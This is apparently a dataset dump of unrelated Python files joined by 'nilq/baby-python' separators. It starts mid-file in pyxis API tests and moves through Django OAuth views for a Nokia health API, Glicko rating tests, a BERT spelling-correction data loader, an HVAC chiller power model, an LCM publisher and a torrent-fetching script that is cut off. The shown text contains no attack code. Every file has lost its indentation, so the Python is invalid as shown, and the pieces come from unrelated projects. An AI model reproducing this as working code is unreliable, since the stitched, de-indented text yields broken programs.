pyxis.put("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_get(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value = {"key": "val"}
resp = pyxis.get("https://foo.com/v1/bar")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_post_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.post.return_value.raise_for_status.side_effect = (
HTTPError(response=response)
)
with pytest.raises(HTTPError):
pyxis.post("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_get_project(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {"key": "val"}
resp = pyxis.get_project("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_project_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_project("https://foo.com/v1", "123")
@patch("operatorcert.pyxis._get_session")
def test_get_vendor_by_org_id(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {"key": "val"}
resp = pyxis.get_vendor_by_org_id("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_vendor_by_org_id_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_vendor_by_org_id("https://foo.com/v1", "123")
@patch("operatorcert.pyxis._get_session")
def test_get_repository_by_isv_pid(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {
"data": [{"key": "val"}]
}
resp = pyxis.get_repository_by_isv_pid("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_repository_by_isv_pid_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_repository_by_isv_pid("https://foo.com/v1", "123")
| nilq/baby-python | python |
from pybuilder.core import use_plugin, init
use_plugin("python.core")
use_plugin("python.unittest")
default_task = "publish"
@init
def initialize(project):
project.version = "0.1.0.SNAPSHOT"
| nilq/baby-python | python |
from drpg.sync import DrpgSync
__all__ = ["DrpgSync"]
__version__ = "2021.11.0"
| nilq/baby-python | python |
import logging
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.core.urlresolvers import reverse
from django.dispatch import receiver
from django.http import HttpResponse, Http404
from django.shortcuts import redirect, render
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from . import utils
from .models import NokiaUser, MeasureGroup
try:
from django.urls import NoReverseMatch
except ImportError:
# Fallback for older Djangos
from django.core.urlresolvers import NoReverseMatch
logger = logging.getLogger(__name__)
@login_required
def login(request):
"""
Begins the OAuth authentication process by obtaining a Request Token from
Nokia and redirecting the user to the Nokia site for authorization.
When the user has finished at the Nokia site, they will be redirected
to the :py:func:`nokiaapp.views.complete` view.
If 'next' is provided in the GET data, it is saved in the session so the
:py:func:`nokiaapp.views.complete` view can redirect the user to that
URL upon successful authentication.
URL name:
`nokia-login`
"""
next_url = request.GET.get('next', None)
if next_url:
request.session['nokia_next'] = next_url
else:
request.session.pop('nokia_next', None)
callback_uri = request.build_absolute_uri(reverse('nokia-complete'))
auth = utils.create_nokia_auth(callback_uri)
auth_url = auth.get_authorize_url()
return redirect(auth_url)
@login_required
def complete(request):
"""
After the user authorizes us, Nokia sends a callback to this URL to
complete authentication.
If there was an error, the user is redirected again to the `error` view.
If the authorization was successful, the credentials are stored for us to
use later, and the user is redirected. If 'next_url' is in the request
session, the user is redirected to that URL. Otherwise, they are
redirected to the URL specified by the setting
:ref:`NOKIA_LOGIN_REDIRECT`.
If :ref:`NOKIA_SUBSCRIBE` is set to True, add a subscription to user
data at this time.
URL name:
`nokia-complete`
"""
callback_uri = request.build_absolute_uri(reverse('nokia-complete'))
auth = utils.create_nokia_auth(callback_uri)
    # QueryDict.get() never raises KeyError, so a missing 'code' is handled
    # by the falsy check below.
    code = request.GET.get('code')
    if not code:
        return redirect(reverse('nokia-error'))
try:
creds = auth.get_credentials(code)
except:
return redirect(reverse('nokia-error'))
user_updates = {
'access_token': creds.access_token,
'token_expiry': creds.token_expiry,
'token_type': creds.token_type,
'refresh_token': creds.refresh_token,
'nokia_user_id': creds.user_id,
'last_update': timezone.now(),
}
nokia_user = NokiaUser.objects.filter(user=request.user)
if nokia_user.exists():
nokia_user.update(**user_updates)
nokia_user = nokia_user[0]
else:
user_updates['user'] = request.user
nokia_user = NokiaUser.objects.create(**user_updates)
# Add the Nokia user info to the session
api = utils.create_nokia(**nokia_user.get_user_data())
request.session['nokia_profile'] = api.get_user()
MeasureGroup.create_from_measures(request.user, api.get_measures())
if utils.get_setting('NOKIA_SUBSCRIBE'):
for appli in [1, 4]:
notification_url = request.build_absolute_uri(
reverse('nokia-notification', kwargs={'appli': appli}))
api.subscribe(notification_url, 'django-nokia', appli=appli)
next_url = request.session.pop('nokia_next', None) or utils.get_setting(
'NOKIA_LOGIN_REDIRECT')
return redirect(next_url)
@receiver(user_logged_in)
def create_nokia_session(sender, request, user, **kwargs):
""" If the user is a Nokia user, update the profile in the session. """
if (user.is_authenticated() and utils.is_integrated(user) and
user.is_active):
nokia_user = NokiaUser.objects.filter(user=user)
if nokia_user.exists():
api = utils.create_nokia(**nokia_user[0].get_user_data())
try:
request.session['nokia_profile'] = api.get_user()
except:
pass
@login_required
def error(request):
"""
The user is redirected to this view if we encounter an error acquiring
their Nokia credentials. It renders the template defined in the setting
:ref:`NOKIA_ERROR_TEMPLATE`. The default template, located at
*nokia/error.html*, simply informs the user of the error::
<html>
<head>
<title>Nokia Authentication Error</title>
</head>
<body>
<h1>Nokia Authentication Error</h1>
            <p>We encountered an error while attempting to authenticate you
through Nokia.</p>
</body>
</html>
URL name:
`nokia-error`
"""
return render(request, utils.get_setting('NOKIA_ERROR_TEMPLATE'), {})
@login_required
def logout(request):
"""Forget this user's Nokia credentials.
If the request has a `next` parameter, the user is redirected to that URL.
Otherwise, they're redirected to the URL defined in the setting
:ref:`NOKIA_LOGOUT_REDIRECT`.
URL name:
`nokia-logout`
"""
nokia_user = NokiaUser.objects.filter(user=request.user)
urls = []
for appli in [1, 4]:
for app in ['nokia', 'withings']:
try:
urls.append(request.build_absolute_uri(reverse(
'{}-notification'.format(app),
kwargs={'appli': appli}
)))
except NoReverseMatch:
# The library user does not have the legacy withings URLs
pass
if nokia_user.exists() and utils.get_setting('NOKIA_SUBSCRIBE'):
try:
api = utils.create_nokia(**nokia_user[0].get_user_data())
subs = api.list_subscriptions()
for sub in subs:
if sub['callbackurl'] in urls:
api.unsubscribe(sub['callbackurl'], appli=sub['appli'])
except:
return redirect(reverse('nokia-error'))
nokia_user.delete()
next_url = request.GET.get('next', None) or utils.get_setting(
'NOKIA_LOGOUT_REDIRECT')
return redirect(next_url)
@csrf_exempt
def notification(request, appli):
""" Receive notification from Nokia.
More information here:
https://developer.health.nokia.com/api/doc#api-Notification-Notification_callback
URL name:
`nokia-notification`
"""
if request.method == 'HEAD':
return HttpResponse()
# The updates come in as a POST request with the necessary data
uid = request.POST.get('userid')
if uid and request.method == 'POST':
for user in NokiaUser.objects.filter(nokia_user_id=uid):
kwargs = {}
if user.last_update:
kwargs['lastupdate'] = user.last_update
try:
measures = utils.get_nokia_data(user, **kwargs)
except Exception:
logger.exception("Error getting nokia user measures")
else:
MeasureGroup.create_from_measures(user.user, measures)
user.last_update = timezone.now()
user.save()
return HttpResponse(status=204)
# If GET request or POST with bad data, raise a 404
raise Http404
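# Hypothetical URL configuration wiring these views together (the URL names
# come from the reverse() calls above; the patterns themselves are
# illustrative and must match your project):
#
#   urlpatterns = [
#       url(r'^login/$', login, name='nokia-login'),
#       url(r'^complete/$', complete, name='nokia-complete'),
#       url(r'^error/$', error, name='nokia-error'),
#       url(r'^logout/$', logout, name='nokia-logout'),
#       url(r'^notification/(?P<appli>\d+)/$', notification,
#           name='nokia-notification'),
#   ]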
| nilq/baby-python | python |
import unittest
from skills import (
Match,
Matches,
Team,
)
from skills.glicko import (
GlickoCalculator,
GlickoGameInfo
)
class CalculatorTests(object):
ERROR_TOLERANCE_RATING = 0.085
ERROR_TOLERANCE_MATCH_QUALITY = 0.0005
def assertAlmostEqual(self, first, second, places, msg, delta):
raise NotImplementedError
def assertRating(self, expected_mean, expected_stdev, actual):
self.assertAlmostEqual(expected_mean, actual.mean, None,
"expected mean of %.14f, got %.14f" % (expected_mean, actual.mean),
CalculatorTests.ERROR_TOLERANCE_RATING)
self.assertAlmostEqual(expected_stdev, actual.stdev, None,
"expected stdev of %.14f, got %.14f" % (expected_stdev, actual.stdev),
CalculatorTests.ERROR_TOLERANCE_RATING)
def assertMatchQuality(self, expected_match_quality, actual_match_quality):
# self.assertEqual(expected_match_quality, actual_match_quality, "expected match quality of %f, got %f" % (expected_match_quality, actual_match_quality))
self.assertAlmostEqual(expected_match_quality, actual_match_quality, None,
"expected match quality of %.15f, got %.15f" % (expected_match_quality, actual_match_quality),
CalculatorTests.ERROR_TOLERANCE_MATCH_QUALITY)
class GlickoTests(unittest.TestCase, CalculatorTests):
def setUp(self):
self.calculator = GlickoCalculator()
def test_one_on_one(self):
game_info = GlickoGameInfo()
player1 = Team({1: (1500, 200)})
player2 = Team({2: (1400, 30)})
player3 = Team({3: (1550, 100)})
player4 = Team({4: (1700, 300)})
matches = Matches([Match([player1, player2], [1, 2]),
Match([player1, player3], [2, 1]),
Match([player1, player4], [2, 1])])
new_ratings = self.calculator.new_ratings(matches, 1, game_info)
# self.assertMatchQuality(1.0, self.calculator.calculate_match_quality(matches, game_info))
self.assertRating(1464.1, 151.4, new_ratings.rating_by_id(1))
if __name__ == "__main__":
unittest.main()
| nilq/baby-python | python |
#! /bin/python
__author__ = "glender"
__copyright__ = "Copyright (c) 2018 glender"
__credits__ = [ "glender" ]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "glender"
__email__ = "None"
__status__ = "Production"
DEBUG = False
alphabet="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
message = ("6340 8309 14010")
import numpy as np
import math
for i in message.split():
    i = int(i)
# We need to solve the following system of equations
eq1 = "-26/676 * y - 1/676 * z + 1/676 * " + str(i)
eq2 = "-676 / 26 * x - 1/26 * z + 1/26 * " + str(i)
eq3 = "-676 * x - 26 * y + " + str(i)
if DEBUG:
print "Solving the following system of equations:"
print eq1
print eq2
print eq3
# Define x,y,z for our solution
x = 1
y = 1
z = 1
# Setup our np arrays to solve for x
a = np.array( [ [-1 * x, -26/676 * y, -1/676 * z], [-676/26 * x, -1 * y, -1/26 * z], [-676 * x, -26 * y, -1 * z] ])
b = np.array( [(-1 * i)/676, (-1 * i)/26, -1 * i] )
ans = np.linalg.solve(a,b)
x = math.floor(ans[0])
# Setup our np arrays to solve for y
a = np.array( [ [-1 * y, -1/26 * z], [-26 * y, -1 * z] ])
b = np.array( [(-1 * i)/26 + ((676/26) * x), (-1 * i) + (676 * x)] )
ans = np.linalg.solve(a,b)
y = math.floor(ans[0])
# Solve for z since we know x and y already
z = -676 * x - 26 * y + float(i)
print alphabet[int(x)] + alphabet[int(y)] + alphabet[int(z)]
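# Note: this script targets Python 2 -- the 3x3 matrix above is only
# non-singular because of Python 2 integer division (e.g. -26/676 == -1);
# under true division all three rows reduce to 676x + 26y + z = i. The
# decoding is therefore just base-26 digit extraction, equivalently:
#   x, rem = divmod(i, 676)
#   y, z = divmod(rem, 26)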
| nilq/baby-python | python |
from __future__ import print_function
import sys
import os
import sysconfig
import filecmp
def diff_q(first_file, second_file):
"""Simulate call to POSIX diff with -q argument"""
if not filecmp.cmp(first_file, second_file, shallow=False):
print("Files %s and %s differ" % (first_file, second_file),
file=sys.stderr)
return 1
return 0
PYTHON = sys.executable or "python"
# 'bro.py' script should be in parent directory
BRO = os.path.abspath("../bro.py")
# get platform- and version-specific build/lib folder
platform_lib_name = "lib.{platform}-{version[0]}.{version[1]}".format(
platform=sysconfig.get_platform(),
version=sys.version_info)
# by default, distutils' build base is in the same location as setup.py
build_base = os.path.abspath(os.path.join("..", "..", "bin"))
build_lib = os.path.join(build_base, platform_lib_name)
# prepend build/lib to PYTHONPATH environment variable
TEST_ENV = os.environ.copy()
if 'PYTHONPATH' not in TEST_ENV:
TEST_ENV['PYTHONPATH'] = build_lib
else:
TEST_ENV['PYTHONPATH'] = build_lib + os.pathsep + TEST_ENV['PYTHONPATH']
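# Illustrative direct use of diff_q (an assumption -- the real test runners
# import this module and launch '../bro.py' via subprocess with TEST_ENV):
#   sys.exit(diff_q('expected.bin', 'actual.bin'))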
| nilq/baby-python | python |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import random
from collections import namedtuple
import re
import numpy as np
import tensorflow as tf
import csv
import tokenization
from mask import Mask, PinyinConfusionSet, StrokeConfusionSet
DEBUG = False
InputExample = namedtuple('InputExample', ['tokens', 'labels', 'domain'])
InputFeatures = namedtuple('InputFeature', ['input_ids', 'input_mask', 'segment_ids', 'lmask', 'label_ids'])
def get_tfrecord_num(tf_file):
num = 0
for record in tf.python_io.tf_record_iterator(tf_file):
num += 1
return num
class DataProcessor:
'''
data format:
sent1\tsent2
'''
def __init__(self, input_path, max_sen_len, vocab_file, out_dir, label_list=None, is_training=True):
self.input_path = input_path
self.max_sen_len = max_sen_len
self.is_training = is_training
self.dataset = None
self.out_dir = out_dir
self.tokenizer = tokenization.FullTokenizer(vocab_file=vocab_file, do_lower_case=False)
self.label_list = label_list
if label_list is not None:
self.label_map = {}
for (i, label) in enumerate(self.label_list):
self.label_map[label] = i
else:
self.label_map = self.tokenizer.vocab
self.label_list = {}
for key in self.tokenizer.vocab:
self.label_list[self.tokenizer.vocab[key]] = key
same_py_file = './datas/confusions/same_pinyin.txt'
simi_py_file = './datas/confusions/simi_pinyin.txt'
stroke_file = './datas/confusions/same_stroke.txt'
tokenizer = self.tokenizer
pinyin = PinyinConfusionSet(tokenizer, same_py_file)
jinyin = PinyinConfusionSet(tokenizer, simi_py_file)
stroke = StrokeConfusionSet(tokenizer, stroke_file)
self.masker = Mask(same_py_confusion=pinyin, simi_py_confusion=jinyin, sk_confusion=stroke)
if input_path is not None:
if is_training is True:
self.tfrecord_path = os.path.join(self.out_dir, "train.tf_record")
else:
if 'multierror' in self.input_path:
self.tfrecord_path = os.path.join(self.out_dir, "eval_merr.tf_record")
else:
self.tfrecord_path = os.path.join(self.out_dir, "eval.tf_record")
#os.remove(self.tfrecord_path)
if os.path.exists(self.tfrecord_path) is False:
self.file2features()
else:
self.num_examples = get_tfrecord_num(self.tfrecord_path)
def sample(self, text_unicode1, text_unicode2, domain=None):
segs1 = text_unicode1.strip().split(' ')
segs2 = text_unicode2.strip().split(' ')
tokens, labels = [], []
if len(segs1) != len(segs2):
return None
for x, y in zip(segs1, segs2):
tokens.append(x)
labels.append(y)
if len(tokens) < 2: return None
return InputExample(tokens=tokens, labels=labels, domain=domain)
def load_examples(self):
'''sent1 \t sent2'''
train_data = open(self.input_path, encoding="utf-8")
instances = []
n_line = 0
for ins in train_data:
n_line += 1
if (DEBUG is True) and (n_line > 1000):
break
#ins = ins.decode('utf8')
tmps = ins.strip().split('\t')
if len(tmps) < 2:
continue
ins = self.sample(tmps[0], tmps[1])
if ins is not None:
yield ins
#instances.append(ins)
def convert_single_example(self, ex_index, example):
label_map = self.label_map
tokens = example.tokens
labels = example.labels
domain = example.domain
seg_value = 0
# Account for [CLS] and [SEP] with "- 2"
if len(tokens) > self.max_sen_len - 2:
tokens = tokens[0:(self.max_sen_len - 2)]
labels = labels[0:(self.max_sen_len - 2)]
_tokens = []
_labels = []
_lmask = []
segment_ids = []
_tokens.append("[CLS]")
_lmask.append(0)
_labels.append("[CLS]")
segment_ids.append(seg_value)
for token, label in zip(tokens, labels):
_tokens.append(token)
_labels.append(label)
_lmask.append(1)
segment_ids.append(seg_value)
_tokens.append("[SEP]")
segment_ids.append(seg_value)
_labels.append("[SEP]")
_lmask.append(0)
input_ids = self.tokenizer.convert_tokens_to_ids(_tokens)
label_ids = self.tokenizer.convert_tokens_to_ids(_labels)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < self.max_sen_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
_lmask.append(0)
assert len(input_ids) == self.max_sen_len
assert len(input_mask) == self.max_sen_len
assert len(segment_ids) == self.max_sen_len
if ex_index < 3:
tf.logging.info("*** Example ***")
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in _tokens]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.logging.info("labels: %s" % " ".join(_labels))
tf.logging.info("labelids: %s" % " ".join(map(str, label_ids)))
tf.logging.info("lmask: %s" % " ".join(map(str, _lmask)))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
lmask=_lmask,
label_ids=label_ids
)
return feature
def get_label_list(self):
return self.label_list
def file2features(self):
output_file = self.tfrecord_path
if os.path.exists(output_file):
os.remove(output_file)
examples = self.load_examples()
writer = tf.python_io.TFRecordWriter(output_file)
for (ex_index, example) in enumerate(examples):
if ex_index % 10000 == 0:
print("Writing example %d" % ex_index)
feature = self.convert_single_example(ex_index, example)
create_int_feature = lambda values: tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
features = collections.OrderedDict()
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
features["lmask"] = create_int_feature(feature.lmask)
features["label_ids"] = create_int_feature(feature.label_ids)
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
self.num_examples = ex_index
def build_data_generator(self, batch_size):
def _decode_record(record):
"""Decodes a record to a TensorFlow example."""
name_to_features = {
"input_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"input_mask": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"segment_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"lmask": tf.FixedLenFeature([self.max_sen_len], tf.int64),
"label_ids": tf.FixedLenFeature([self.max_sen_len], tf.int64),
}
example = tf.parse_single_example(record, name_to_features)
#int64 to int32
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
input_ids = example['input_ids']
input_mask = example['input_mask']
segment_ids = example['segment_ids']
label_ids = example['label_ids']
lmask = example['lmask']
if self.is_training is True:
#if str(self.is_training) == 'xx' :
masked_sample = tf.py_func(self.masker.mask_process, [input_ids, label_ids], [tf.int32])
masked_sample = tf.reshape(masked_sample, [self.max_sen_len])
lmask = tf.reshape(lmask, [self.max_sen_len])
else:
masked_sample = input_ids
return input_ids, input_mask, segment_ids, lmask, label_ids, masked_sample
if self.dataset is not None:
return self.dataset
dataset = tf.data.TFRecordDataset(self.tfrecord_path)
dataset = dataset.map(_decode_record, num_parallel_calls=10)
if self.is_training:
dataset = dataset.repeat().shuffle(buffer_size=100)
dataset = dataset.batch(batch_size).prefetch(50)
self.dataset = dataset
return dataset
def get_feature(self, u_input, u_output=None):
if u_output is None:
u_output = u_input
instance = self.sample(u_input, u_output)
feature = self.convert_single_example(0, instance)
input_ids = feature.input_ids
input_mask = feature.input_mask
segment_ids = feature.segment_ids
label_ids = feature.label_ids
label_mask = feature.lmask
return input_ids, input_mask, segment_ids, label_ids, label_mask
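# Illustrative usage (file paths are assumptions; with label_list=None the
# BERT vocab doubles as the label space, as handled in __init__ above):
#   dp = DataProcessor('train.txt', max_sen_len=128, vocab_file='vocab.txt',
#                      out_dir='./out', is_training=True)
#   dataset = dp.build_data_generator(batch_size=32)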
| nilq/baby-python | python |
"""Calculate autosome ratios for each cell.
This script calculates the {X, 4, and Y} to autosome ratios for each
individual cell. I consider chromosomes 2L, 2R, 3L, and 3R as autosomes.
1. Pull out target FBgns.
2. Sum the number of raw reads for each chromosome.
3. Normalize totals by the number of genes on each chromosome.
4. Take the ratio of X / A, 4 / A, and Y / A
"""
import pandas as pd
from larval_gonad.io import pickle_load
def main(snake):
annot = gene_annotation_for_target_genes(snake["fbgn2chrom"], snake["target_fbgns"])
clusters = pd.read_feather(snake["clusters"]).set_index("cell_id")
num_genes_per_chrom = calculate_number_of_genes_per_chrom(annot, snake["autosomes"])
agg_counts = aggregate_count_data_to_chrom(snake["raw"], annot, snake["chrom_order"])
ratios = calculate_ratios(agg_counts, num_genes_per_chrom, snake['autosomes'])
ratios.join(clusters, how="inner").reset_index().to_feather(snake["output_file"])
def gene_annotation_for_target_genes(fbgn2chrom: str, target_fbgns: str) -> pd.DataFrame:
"""Subset fbg2chrom based on target gene set."""
return pickle_load(fbgn2chrom).reindex(pickle_load(target_fbgns)).dropna().squeeze()
def calculate_number_of_genes_per_chrom(annot: pd.DataFrame, autosomes: list) -> pd.Series:
"""Count the number of genes on each chromosome and the autosomes together."""
num_genes_per_chrom = annot.value_counts()
num_genes_per_chrom["autosome"] = num_genes_per_chrom.loc[autosomes].sum()
return num_genes_per_chrom
def aggregate_count_data_to_chrom(raw: str, annot: pd.DataFrame, chrom_order: list) -> pd.DataFrame:
"""Sum the number of reads for each chromosome."""
return (
pd.read_feather(raw)
.set_index("FBgn")
.join(annot, how="inner")
.groupby("chrom")
.sum()
.reindex(chrom_order)
.fillna(0)
.T.rename_axis("cell_id")
)
def calculate_ratios(
agg_counts: pd.DataFrame, num_genes_per_chrom: pd.Series, autosomes: list
) -> pd.Series:
"""Normalize by gene count and calculate autosome ratios."""
return (
agg_counts.assign(autosome=lambda agg_counts: agg_counts[autosomes].sum(axis=1))
.div(num_genes_per_chrom / 1e3, axis="columns")
.assign(x_to_a_ratio=lambda agg_counts: agg_counts["X"] / agg_counts.autosome)
.assign(fourth_to_a_ratio=lambda agg_counts: agg_counts["4"] / agg_counts.autosome)
.assign(y_to_a_ratio=lambda agg_counts: agg_counts["Y"] / agg_counts.autosome)
.loc[:, ["x_to_a_ratio", "fourth_to_a_ratio", "y_to_a_ratio"]]
)
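# Worked example of the normalization above (illustrative numbers): with 100
# X-linked genes and 1000 autosomal genes, 50 X reads and 400 autosomal reads
# give x_to_a_ratio = (50 / 0.1) / (400 / 1.0) = 1.25, since counts are
# divided by (genes per chromosome / 1e3).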
if __name__ == "__main__":
SNAKE = dict(
raw=snakemake.input["raw"],
fbgn2chrom=snakemake.input["fbgn2chrom"],
clusters=snakemake.input["clusters"],
target_fbgns=snakemake.input["target_fbgns"],
autosomes=snakemake.params["autosomes"],
chrom_order=snakemake.params["chrom_order"],
output_file=snakemake.output[0],
)
# Debug Settings
# import os
# try:
# os.chdir(os.path.join(os.getcwd(), "x-to-a-wf/scripts"))
# print(os.getcwd())
# except:
# pass
# from larval_gonad.config import read_config
# config = read_config("../../config/common.yaml")
# SNAKE = dict(
# raw="../../output/cellselection-wf/raw.feather"
# fbgn2chrom="../../output/x-to-a-wf/fbgn2chrom.pkl"
# clusters="../../output/seurat3-cluster-wf/combined_n3_clusters.feather"
# target_fbgns='../../output/cellselection-wf/commonly_expressed_genes.pkl'
# snake_autosomes=config["autosomes"]
# snake_chrom_order=config["chrom_order"]
# snake_output_file=''
# )
main(SNAKE)
| nilq/baby-python | python |
from django.conf.urls import url
from . import views
urlpatterns = [
url('api/product/search', views.GoodsSearch),
url('api/product/history', views.GetHistory)
]
| nilq/baby-python | python |
import logging
import importlib
from volttron.platform.agent import utils
import volttron.pnnl.models.input_names as data_names
_log = logging.getLogger(__name__)
utils.setup_logging()
class ahuchiller(object):
def __init__(self, config, parent, **kwargs):
self.parent = parent
equipment_conf = config.get("equipment_configuration")
model_conf = config.get("model_configuration")
self.cpAir = model_conf["cpAir"]
self.c0 = model_conf["c0"]
self.c1 = model_conf["c1"]
self.c2 = model_conf["c2"]
self.c3 = model_conf["c3"]
self.power_unit = model_conf.get("unit_power", "kw")
self.cop = model_conf["COP"]
self.mDotAir = model_conf.get("mDotAir", 0.0)
self.name = 'AhuChiller'
self.has_economizer = equipment_conf["has_economizer"]
self.economizer_limit = equipment_conf["economizer_limit"]
self.min_oaf = equipment_conf.get("minimum_oaf", 0.15)
self.vav_flag = equipment_conf.get("variable-volume", True)
self.sat_setpoint = equipment_conf["supply-air sepoint"]
self.building_chiller = equipment_conf["building chiller"]
self.tset_avg = equipment_conf["nominal zone-setpoint"]
self.tDis = self.sat_setpoint
self.parent.supply_commodity = "ZoneAirFlow"
self.fan_power = 0.
self.mDotAir = 0.
self.coil_load = 0.
self.get_input_value = parent.get_input_value
self.smc_interval = parent.single_market_contol_interval
self.parent = parent
self.sfs_name = data_names.SFS
self.mat_name = data_names.MAT
self.dat_name = data_names.DAT
self.saf_name = data_names.SAF
self.oat_name = data_names.OAT
self.rat_name = data_names.RAT
self.sfs = None
self.mat = None
self.dat = None
self.saf = None
self.oat = None
self.rat = None
def update_data(self):
self.sfs = self.get_input_value(self.sfs_name)
self.mat = self.get_input_value(self.mat_name)
self.dat = self.get_input_value(self.dat_name)
self.saf = self.get_input_value(self.saf_name)
self.oat = self.get_input_value(self.oat_name)
self.rat = self.get_input_value(self.rat_name)
def input_zone_load(self, q_load):
if self.vav_flag:
self.mDotAir = q_load
else:
self.tDis = q_load
self.dat = q_load
def calculate_fan_power(self):
if self.power_unit == 'W':
self.fan_power = (self.c0 + self.c1*self.mDotAir + self.c2*pow(self.mDotAir, 2) + self.c3*pow(self.mDotAir, 3))*1000. # watts
else:
self.fan_power = self.c0 + self.c1*self.mDotAir + self.c2*pow(self.mDotAir, 2) + self.c3*pow(self.mDotAir, 3) # kW
def calculate_coil_load(self, oat):
if self.has_economizer:
if oat < self.tDis:
coil_load = 0.0
elif oat < self.economizer_limit:
coil_load = self.mDotAir * self.cpAir * (self.tDis - oat)
else:
mat = self.tset_avg*(1.0 - self.min_oaf) + self.min_oaf*oat
coil_load = self.mDotAir * self.cpAir * (self.tDis - mat)
else:
mat = self.tset_avg * (1.0 - self.min_oaf) + self.min_oaf * oat
coil_load = self.mDotAir * self.cpAir * (self.tDis - mat)
if coil_load > 0: #heating mode is not yet supported!
self.coil_load = 0.0
else:
self.coil_load = coil_load
def calculate_load(self, q_load, oat):
self.input_zone_load(q_load)
return self.calculate_total_power(oat)
def single_market_coil_load(self):
try:
self.coil_load = self.mDotAir * self.cpAir * (self.dat - self.mat)
except:
_log.debug("AHU for single market requires dat and mat measurements!")
self.coil_load = 0.
def calculate_total_power(self, oat):
self.calculate_fan_power()
oat = oat if oat is not None else self.oat
if self.building_chiller and oat is not None:
if self.smc_interval is not None:
self.single_market_coil_load()
else:
self.calculate_coil_load(oat)
else:
_log.debug("AHUChiller building does not have chiller or no oat!")
self.coil_load = 0.0
return abs(self.coil_load)/self.cop/0.9 + max(self.fan_power, 0)
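# Illustrative configuration (keys taken from __init__ above; the numeric
# values are made-up placeholders, not recommended defaults):
#   config = {
#       "model_configuration": {"cpAir": 1.006, "c0": 0.0, "c1": 0.5,
#                               "c2": 0.0, "c3": 0.0, "COP": 3.5,
#                               "unit_power": "kw"},
#       "equipment_configuration": {"has_economizer": True,
#                                   "economizer_limit": 18.0,
#                                   "supply-air sepoint": 12.8,
#                                   "building chiller": True,
#                                   "nominal zone-setpoint": 22.0},
#   }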
| nilq/baby-python | python |
import sys
sys.path.append('../')
import lcm
import time
from exlcm import ax_control_t
from exlcm import veh_status_t
from exlcm import net_status_t
from exlcm import mode_control_t
from exlcm import eng_toggle_t
lc = lcm.LCM()
test_message = veh_status_t()
test_message.running = True
test_message.rpm = 3110
test_message.speed = 40
test_message.temp = 220
test_message.fuel_flow = 346
test_message.pressure = 1230
eng_toggle_msg = eng_toggle_t()
eng_toggle_msg.toggle = True
signal_message = net_status_t()
signal_message.signal_str = 4
mode_message = mode_control_t()
mode_message.evos_mode = "DEV"
while True:
lc.publish("eng_status", test_message.encode())
lc.publish("net_status", signal_message.encode())
lc.publish("mode_control", mode_message.encode())
lc.publish("eng_toggle", eng_toggle_msg.encode())
    print('Printing..')
    time.sleep(1)
    test_message.rpm += 1
    # 'not' keeps the field boolean; '~True' evaluates to -2, which is truthy
    eng_toggle_msg.toggle = not eng_toggle_msg.toggle
| nilq/baby-python | python |
import datetime
import json
import pathlib
import time
import httpx
import xmltodict
import yaml
nyaa_url = 'https://nyaa.si'
transmission_rpc_url = "http://localhost:9091/transmission/rpc"
session_field = 'X-Transmission-Session-Id'
class TransmissionApi():
def __init__(self):
self.restart_session()
def restart_session(self):
self.session = httpx.Client(base_url=transmission_rpc_url)
response = self.session.post(url='', data={'method': 'session-get'})
self.headers = {session_field: response.headers[session_field]}
def torrent_add(self, torrent_url, download_location, tries=2):
if tries == 0:
raise Exception('Error contacting Transmission server.')
data = json.dumps({
'method': 'torrent-add'
, 'arguments':
{ 'download-dir': str(download_location)
, 'filename': torrent_url
}
})
response:httpx.Response = self.session.post(url='', headers=self.headers, content=data)
if response.status_code == 200:
print(datetime.datetime.now(), download_location)
elif response.status_code == 409:
self.restart_session()
self.torrent_add(torrent_url, download_location, tries - 1)
def ensure_list(thing):
return thing if type(thing) is list else [thing]
def get_torrent_data_for_show(search_string):
response = httpx.get(nyaa_url, params={'page': 'rss', 'q': search_string})
